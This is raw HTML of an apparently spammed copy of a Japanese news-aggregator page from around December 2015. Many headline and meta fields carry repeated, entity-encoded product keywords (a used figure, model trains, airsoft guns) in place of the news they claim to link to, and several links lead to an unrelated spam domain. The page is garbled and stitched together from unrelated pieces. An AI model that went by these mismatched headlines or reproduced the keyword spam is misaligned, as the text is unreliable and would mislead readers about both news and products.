&#12458;&#12513;&#12460;&#12514;&#12531;&#12288;&#12496;&#12531;&#12480;&#12452;,&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,&#12466;&#12540;&#12512;,&#12524;&#12488;&#12525;&#12466;&#12540;&#12512;" /> <meta name="viewport" content="width=device-width; initial-scale=1.0;" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:site" content="1/48 &#12513;&#12483;&#12469;&#12540;&#12471;&#12517;&#12511;&#12483;&#12488;Bf109G-2 Trop "W.&#12471;&#12517;&#12525;&#12450;&#12540;" : &#12495;&#12475;&#12460;&#12527;" /> <meta property="og:title" content="&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; " /> <meta property="og:description" content="FAIRY TAIL &#12490;&#12484;?&#12489;&#12521;&#12464;&#12491;&#12523; (1/7&#12473;&#12465;&#12540;&#12523; PVC&#35069;&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;) &#12464;&#12483;&#12489;&#12473;&#12510;&#12452;&#12523;&#12459;&#12531;&#12497;&#12491;&#12540;,&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,&#25216;MIX &#25216;HC13 &#31859;&#38520; MH47G &#31532;160 &#12488;&#12511;&#12540;&#12486;&#12483;&#12463;,PC&#12466;&#12540;&#12512;" /> <meta property="og:site_name" content="&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; " /> <link rel="stylesheet" type="text/css" href="http://ceron.jp/css.css" media="all" /> <link rel="stylesheet" type="text/css" href="http://ceron.jp/js/jquery-ui.css" media="all" /> <link rel="alternate" type="application/rss+xml" title="RSS" href="p-21363.html" /> <script type="text/javascript" src="./jquery.js"></script>p-21363.html" </head> <body> <div id="main" class="top"> <div id="header"> <div id="header_inner"> <div id="leader">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,JG MS-06S &#12471;&#12515;&#12450;?&#12450;&#12474;&#12490;&#12502;&#12523;&#23554;&#29992; &#12470;&#12463;II &#12522;&#12450;&#12523;&#12479;&#12452;&#12503;&#12459;&#12521;&#12540; (&#23436;&#25104;&#21697;) (&#27231;&#21205;&#25126;&#22763;&#12460;&#12531;&#12480;&#12512;)&#12288;&#12496;&#12531;&#12480;&#12452;<span class="icon_set"> <a href="http://www.twitter.com/" target="_blank" title="twitter&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; " class="icon icon_twitter"></a> <a href="https://www.facebook.com/" target="_blank" title="facebook&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; " class="icon icon_facebook"></a> </span> </div> <div id="header_menu" onclick="toggle('drop_menu');"> <div id="drop_menu" style="display:none;"> <ul> <li><a href="" class="selected">トップ</a></li><li><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; </a></li><li><a href="">ニュース総合</a></li><li><a href="">&#12509;&#12540;&#12479;&#12502;&#12523;&#12466;&#12540;&#12512;</a></li><li><a href="">エンタメ</a></li><li><a href="">スポーツ</a></li><li><a href="">IT</a></li><li><a href="">DVD?Blu-ray</a></li><li><a href="">科学</a></li><li><a href="">TOMIX(&#12488;&#12511;&#12483;&#12463;&#12473;) [N]JR E4&#31995; &#26481;&#21271;?&#19978;&#36234;&#26032;&#24185;&#32218;&#65288;MAX&#65289;&#22679;&#32080;&#12475;&#12483;&#12488;&#65313;&#12288;&#37444;&#36947;&#27169;&#22411; BIGMAN ( &#12499;&#12483;&#12464;&#12510;&#12531; )</a></li><li><a href="">動画</a></li><li><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; </a></li><li><a href="">ネタ</a></li><li><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; </a></li> <li><a href='http://ceron.jp/registered.html'>メディア一覧</a></li> <li><a href=''>ランキング</a></li> <li><a href='https://twitter.com/' target='_blank'>Twitter</a></li> <li><a href=''>ヘルプ</a></li> <li><a href=''>設定</a></li> <li><a href=''>&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; </a></li> </ul> </div> </div> <h1> <a id="logo" href="" title="&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; "> <img class="logo_l" src="../img/logo.png" width="184px" height="54px" /> </h1> <form action="/search" method="get" name="search" id="header_search" onsubmit="return headerSearchReady();"> <div id="input_box"><input type="text" id="header_search_textarea" class="search" name="q" value="" placeholder="キーワード or URL" onclick="if(!this.value){this.setAttribute('AutoComplete','on');}" onkeyup="this.setAttribute('AutoComplete', 'off');" onsubmit="this.setAttribute('AutoComplete', 'on');" /></div> <div class="search_button" onclick="document.getElementById('submitButton').click();"></div> <input type="submit" style="display:none;" id="submitButton" /> </form> </div><!--end header_inner--> </div><!--end header--> <div id="menu_bar" class="menu_bar"> <div id="menu_bar_inner" class="menu_bar_inner"><ul><li><a href="" class="selected">トップ</a></li><li><a href="">速報</a></li><li><a href="">&#26481;&#20140;&#12510;&#12523;&#12452;&#12288;&#12460;&#12473;&#12522;&#12508;&#12523;&#12496;&#12540;&#12288;S&W (&#12473;&#12511;&#12473;&#65286;&#12454;&#12455;&#12483;&#12477;&#12531;)&#12288;M19&#12288;4&#12452;&#12531;&#12481; BIGMAN ( &#12499;&#12483;&#12464;&#12510;&#12531; )</a></li><li><a href="">政治経済</a></li><li><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; </a></li><li><a href="">スポーツ</a></li><li><a href="">IT</a></li><li><a href="">海外</a></li><li><a href="">科学</a></li><li><a href="">&#26032;&#19990;&#32000;&#12456;&#12532;&#12449;&#12531;&#12466;&#12522;&#12458;&#12531;&#32190;&#27874;&#12524;&#12452;&#27700;&#30528;&#12473;&#12459;&#12452;&#12502;&#12523;&#12540;&#12479;&#12452;&#12503;&#65288;1/8&#12473;&#12465;&#12540;&#12523;&#12467;&#12540;&#12523;&#12489;&#12461;&#12515;&#12473;&#12488;&#35069;&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#65289; &#12450;&#12452;&#12474;&#12503;&#12525;&#12472;&#12455;&#12463;&#12488;</a></li><li><a href="">動画</a></li><li><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; </a></li><li><a href="">ネタ</a></li><li><a href="">すべて</a></li></ul></div> </div><!-- /menu_bar --> <div id="field"> <div id="field_inner"> <div id="main_column"> <div id="main_column_inner"><div id="pan"></div><a name="area_1"></a> <div class="item_list_box " id="area_1"> <div class="list_title"> <div class="controler"></div> <h2><a href="">ニュース総合</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over500">528<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,ZIPPO &#12472;&#12483;&#12509; &#12472;&#12483;&#12509;&#12540; &#12521;&#12452;&#12479;&#12540; &#12473;&#12479;&#12472;&#12458;&#12472;&#12502;&#12522; &#12392;&#12394;&#12426;&#12398;&#12488;&#12488;&#12525;&#12300;&#12493;&#12467;&#12496;&#12473;&#12301;NZ22 &#12510;&#12463;&#12486;&#12451;&#12540;,&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,&#12524;&#12468; &#12501;&#12524;&#12531;&#12474; &#12469;&#12510;&#12540;&#12461;&#12515;&#12531;&#12503; 3184</a></div> <div class="thumbnail"><a class="trimming imgbox" href="http://ceron.jp/url/headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" style="width:120px;height:120px;"><img src="http://img.ceron.jp/db592e52fb3695e73bb88902c6c90a5b239cd30b.jpg" width="120" height="120" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,&#12503;&#12522;&#12474;&#12512;&#12467;&#12493;&#12463;&#12488; &#12358;&#12383;&#12398;&#9734;&#12503;&#12522;&#12531;&#12473;&#12373;&#12414;&#12387;? &#12510;&#12472;LOVE1000% &#12473;&#12479;&#12540;&#12479;&#12540;&#12487;&#12483;&#12461; : &#12456;&#12531;&#12473;&#12459;&#12452;,&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,KSC&#12288;&#12460;&#12473;&#12502;&#12525;&#12540;&#12496;&#12483;&#12463;&#12288;MP7A1-II&#12288;40&#36899;&#12510;&#12460;&#12472;&#12531;2&#26412;&#20184;&#12288;(&#12475;&#12511;/&#12501;&#12523;&#12458;&#12540;&#12488;&#20999;&#26367;&#24335;)&#12288; BIGMAN ( &#12499;&#12483;&#12464;&#12510;&#12531; )</span>...ï¼»<a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank">続きを読む</a>ï¼½</p> </div> </div><span class='debug' style='display:none;'><!--score: 70 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">398<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000062-san-sctch" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02031003112.html">http://factory.aedew.com/logs/bloglease/02031003112.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 55 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">198<span>コメント</span></span> <span class="date date_new">5 時間前  </span> <a href="http://www.yomiuri.co.jp/national/20151226-OYT1T50002.html" target="_blank" class="item_direct"> - www.yomiuri.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02031018467.html">http://factory.aedew.com/logs/bloglease/02031018467.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 36 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">194<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/life/news/151226/lif1512260005-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,&#12304;&#20104;&#32004;&#27880;&#25991;&#12305;2015&#24180;9&#26376;&#20104;&#23450;&#12288;MICROACE(&#12510;&#12452;&#12463;&#12525;&#12456;&#12540;&#12473;) [N] &#12304;A6891&#12305;&#12288;&#39318;&#37117;&#22287;&#26032;&#37117;&#24066;&#37444;&#36947;&#65288;&#12388;&#12367;&#12400;&#12456;&#12463;&#12473;&#12503;&#12524;&#12473;&#65289;TX-2000&#31995;6&#20001;&#12475;&#12483;&#12488;&#12288;&#37444;&#36947;&#27169;&#22411;,TOMIX(&#12488;&#12511;&#12483;&#12463;&#12473;)&#12304;ho-254&#12305; [HO]&#12288;&#12469;&#12525;124&#24418;&#65288;&#26032;&#28248;&#21335;&#33394;&#65289;&#12288;&#37444;&#36947;&#27169;&#22411; BIGMAN ( &#12499;&#12483;&#12464;&#12510;&#12531; )</a></div> </div> <span class='debug' style='display:none;'><!--score: 30 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">191<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://www.asahi.com/articles/ASHDT662ZHDTTPJB01B.html" target="_blank" class="item_direct"> - www.asahi.com</a></div> <div class="item_title"><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,TOMIX(&#12488;&#12511;&#12483;&#12463;&#12473;) &#12304;90157&#12305; &#12505;&#12540;&#12471;&#12483;&#12463;&#12475;&#12483;&#12488;SD N700&#31995;&#12398;&#12382;&#12415;&#12288;&#37444;&#36947;&#27169;&#22411; BIGMAN ( &#12499;&#12483;&#12464;&#12510;&#12531; )</a></div> </div> <span class='debug' style='display:none;'><!--score: 29 --></span> <div class="more"><a href="http://www.yomiuri.co.jp/latestnews/?from=ygnav2">ニュース総合 をもっと見る</a></div> </div> <a name="area_2"></a> <div class="item_list_box " id="area_2"> <div class="list_title"> <div class="controler"></div> <h2><a href="http://factory.aedew.com/logs/bloglease/02031022185.html">http://factory.aedew.com/logs/bloglease/02031022185.html</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over100">146<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; </a></div> <div class="thumbnail"><a class="trimming imgbox" href="http://ceron.jp/url/www.sankei.com/politics/news/151226/plt1512260001-n1.html" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3d712f4a9f0d5a17af803c20b36a4d9d8bec0ea2.jpg" width="120" height="170" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>&#12467;&#12511;&#12483;&#12463;,KATO(&#12459;&#12488;&#12540;) 10-1244&#12288;[N] &#38442;&#24613;6300&#31995; 4&#20001;&#22522;&#26412;&#12475;&#12483;&#12488;&#12288;&#12288;&#37444;&#36947;&#27169;&#22411; BIGMAN ( &#12499;&#12483;&#12464;&#12510;&#12531; ),&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,&#12304;&#20104;&#32004;&#27880;&#25991;&#12305;&#30330;&#22770;&#26085;&#26410;&#23450;&#12288;MICROACE(&#12510;&#12452;&#12463;&#12525;&#12456;&#12540;&#12473;) [N] &#12304;A0788&#12305;&#12288;105&#31995;-500 &#21644;&#27468;&#23665;&#32218; &#38738;&#32209;&#33394; 4&#20001;&#12475;&#12483;&#12488;&#12288;&#37444;&#36947;&#27169;&#22411;,&#12525;&#12540;&#12477;&#12531;&#38480;&#23450; &#12456;&#12532;&#12449;&#12531;&#12466;&#12522;&#12458;&#12531;&#26032;&#21127;&#22580;&#29256;&#65306;&#30772; &#24335;&#27874;?&#12450;&#12473;&#12459;?&#12521;&#12531;&#12464;&#12524;&#12540; LoppiVer. &#23436;&#25104;&#21697;&#12501;&#12451;&#12462;&#12517;&#12450; &#22781;&#23627;</span>...ï¼»<a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank">続きを読む</a>ï¼½</p> </div> </div><span class='debug' style='display:none;'><!--score: 27 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">69<span>コメント</span></span> <span class="date date_new">7 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260002-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">【辺野古移設問題】活動家を初の起訴 シュワブ前で機動隊員を蹴る 反対派の活動実態を解明へ(1/2ページ) - 産経ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 16 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">129<span>コメント</span></span> <span class="date date_new">9 時間前  </span> <a href="http://www.yomiuri.co.jp/world/20151225-OYT1T50134.html" target="_blank" class="item_direct"> - www.yomiuri.co.jp</a></div> <div class="item_title"><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,&#27231;&#38306;&#36554;&#12488;&#12540;&#12510;&#12473;&#12288;&#12522;&#12514;&#12540;&#12488;&#24335;&#12488;&#12524;&#12452;&#12531;&#12475;&#12483;&#12488;&#12288;Lionel Thomas And Friends Remote Train Set - O-Gauge&#12288;&#20006;&#34892;&#36664;&#20837;&#21697;</a></div> </div> <span class='debug' style='display:none;'><!--score: 13.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">129<span>コメント</span></span> <span class="date date_new">9 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151225-00050134-yom-int" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title">ソウル日本大使館前の少女像、韓国が移転を検討 (読売新聞) - Yahoo!ニュース</div> </div> <span class='debug' style='display:none;'><!--score: 13 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">86<span>コメント</span></span> <span class="date date_new">17 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151225-00000001-jct-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02031024037.html">http://factory.aedew.com/logs/bloglease/02031024037.html</a>-Portrait.Of.Pirates &#12527;&#12531;&#12500;&#12540;&#12473;&#12471;&#12522;&#12540;&#12474;NEO-EX &#12459;&#12523;&#12540;</div> </div> <span class='debug' style='display:none;'><!--score: 10 --></span> <div class="more"><a href="http://news.yahoo.co.jp/hl?c=bus">&#26360;&#31821;</a></div> </div> <a name="area_5"></a> <div class="item_list_box " id="area_5"> <div class="list_title"> <div class="controler"></div> <h2><a href="">IT・テクノロジー</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">24<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://pc.watch.impress.co.jp/docs/column/mobiler/20151226_737137.html" target="_blank" class="item_direct"> - pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="">【モバイラーが憧れた名機を今風に蘇らせる】ソニー「バイオノート505エクストリーム」 ~最初にして最後の究極。これぞモバイラーのステータス - PC Watch</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/d4cd9a68ed5dd7ad42cacbc69a1cf4fe257d279e.jpg" width="160" height="120" onerror="this.parentNode.style.display='none'" style="left:-20px" /></a></div><p>HDDは東芝製の5mm厚の1.8インチタイプ。これもフレキケーブルで接続されている 天板および底面カバーだが、店頭モデルでは「<span>ニッケル強化カーボンモールド」、ソニースタイル専用の直販モデルでは「カーボンファイバー積層板」を採用するとされている。今回入手したのは店頭モデルで、前者を採用している。“ニッケル強化カーボンモ</span>...ï¼»<a href="http://pc.watch.impress.co.jp/docs/column/mobiler/20151226_737137.html" target="_blank">続きを読む</a>ï¼½</p> </div> </div><span class='debug' style='display:none;'><!--score: 4 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">1 時間前  </span> <a href="http://akiba-pc.watch.impress.co.jp/docs/news/news/20151226_737187.html" target="_blank" class="item_direct"> - akiba-pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02031050956.html">http://factory.aedew.com/logs/bloglease/02031050956.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">97<span>コメント</span></span> <span class="date date_new">22 時間前  </span> <a href="http://www.itmedia.co.jp/news/articles/1512/25/news108.html" target="_blank" class="item_direct"> - www.itmedia.co.jp</a></div> <div class="item_title"><a href="">&#12302;&#20474;&#12398;&#22969;&#12364;&#12371;&#12435;&#12394;&#12395;&#21487;&#24859;&#12356;&#12431;&#12369;&#12364;&#12394;&#12356;&#12290;&#12303;&#39640;&#22338;&#26704;&#20035; TRUE END ver.&#12288;&#12450;&#12473;&#12461;&#12540;?&#12513;&#12487;&#12451;&#12450;&#12527;&#12540;&#12463;&#12473;</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">88<span>コメント</span></span> <span class="date date_new">20 時間前  </span> <a href="http://www.itmedia.co.jp/news/articles/1512/25/news130.html" target="_blank" class="item_direct"> - www.itmedia.co.jp</a></div> <div class="item_title"><a href="http://ceron.jp/url/www.itmedia.co.jp/news/articles/1512/25/news130.html">4文字しか使えないコミュニケーションアプリ「Ping」 - ITmedia ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 2.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">13<span>コメント</span></span> <span class="date date_new">13 時間前  </span> <a href="http://akiba-pc.watch.impress.co.jp/docs/wakiba/find/20151225_737149.html" target="_blank" class="item_direct"> - akiba-pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="">U.S.S.&#12456;&#12531;&#12479;&#12540;&#12503;&#12521;&#12452;&#12474; NCC-1701-A (1/350)&#12288;&#12509;&#12540;&#12521;&#12521;&#12452;&#12484;,&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; </a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="more"><a href="">IT・テクノロジー をもっと見る</a></div> </div> <a name="area_7"></a> <div class="item_list_box " id="area_7"> <div class="list_title"> <div class="controler"></div> <h2><a href="">科学・学問</a></h2> </div> <div class="item"> <div class="item_status"> <span class="link_num over20">22<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://nlab.itmedia.co.jp/nl/articles/1512/26/news025.html" target="_blank" class="item_direct"> - nlab.itmedia.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02031024093.html">http://factory.aedew.com/logs/bloglease/02031024093.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">13 時間前  </span> <a href="http://www.asahi.com/articles/ASHDT7KWMHDTPTIL02V.html" target="_blank" class="item_direct"> - www.asahi.com</a></div> <div class="item_title"><a href="">阪大院教授らの研究費不正経理、2.7億円 大学が発表:朝日新聞デジタル</a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">14 時間前  </span> <a href="http://karapaia.livedoor.biz/archives/52207962.html" target="_blank" class="item_direct"> - karapaia.livedoor.biz</a></div> <div class="item_title"><a href="">Radio Flyer Cyclone-640 &#12521;&#12472;&#12458;&#12501;&#12521;&#12452;&#12516;&#12540;</a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="more"><a href="">科学・学問 をもっと見る</a></div> </div> <a name="area_9"></a> <div class="item_list_box " id="area_9"> <div class="list_title"> <div class="controler"></div> <h2><a href="">2chまとめ</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">27<span>コメント</span></span> <span class="date date_new">7 時間前  </span> <a href="http://alfalfalfa.com/articles/140445.html" target="_blank" class="item_direct"> - alfalfalfa.com</a></div> <div class="item_title"><a href="">書店「Amazonばっかで本買うのやめてや!!」←これ | 2ちゃんねるスレッドまとめブログ - アルファルファモザイク</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3b61c537fc58f529bf419a5c974cab5d82588790.jpg" width="213" height="120" onerror="this.parentNode.style.display='none'" style="left:-46px" /></a></div><p>14:風吹けば名無し@\(^o^)/2015/12/25(金) 10:07:08.94ID:28CoKVMbaXMAS.net焼<span>肉屋の名前みたい34:風吹けば名無し@\(^o^)/2015/12/25(金) 10:09:31.60ID:uAnL49f+0XMAS.net普通に本屋で買ってるぞ54:風吹けば名無し@\(^o^)/2015/12/25(金) 10</span>...ï¼»<a href="" target="_blank">続きを読む</a>ï¼½</p> </div> </div><span class='debug' style='display:none;'><!--score: 5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">18<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://blog.esuteru.com/archives/8449829.html" target="_blank" class="item_direct"> - blog.esuteru.com</a></div> <div class="item_title"><a href="">【は?】「『仏滅』『大安』などが書かれたカレンダーを回収します。差別につながるので」 ← 意味不明すぎて理解できないんだが : はちま起稿</a></div> </div> <span class='debug' style='display:none;'><!--score: 4.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">66<span>コメント</span></span> <span class="date date_new">14 時間前  </span> <a href="http://blog.livedoor.jp/dqnplus/archives/1864971.html" target="_blank" class="item_direct"> - 